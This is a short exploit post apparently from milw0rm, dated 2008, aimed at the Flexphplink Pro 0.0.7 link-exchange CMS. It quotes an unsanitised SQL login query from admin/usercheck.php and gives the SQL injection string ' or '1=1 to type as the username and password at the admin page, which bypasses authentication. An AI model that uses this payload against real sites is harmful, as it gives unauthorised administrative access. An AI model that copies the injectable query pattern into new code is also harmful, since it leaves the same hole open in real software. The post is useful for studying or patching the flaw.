############################################# Autore: x0r Email: andry2000@hotmail.it Site: http://w00tz0ne.altervista.org/index.php Cms: Flexphplink Pro Version: 0.0.7 Download: http://www.china-on-site.com/flexphplink/downloads.html ############################################## Bug In \admin\usercheck.php $sql = "select username,adminid from linkexadmin where username='$checkuser' and password='$checkpass'"; Exploit: Go to /[path]/admin/index.php Put as username and password the following sql code: ' or '1=1 Greetz: Visit My Site Pls :P # milw0rm.com [2008-12-29]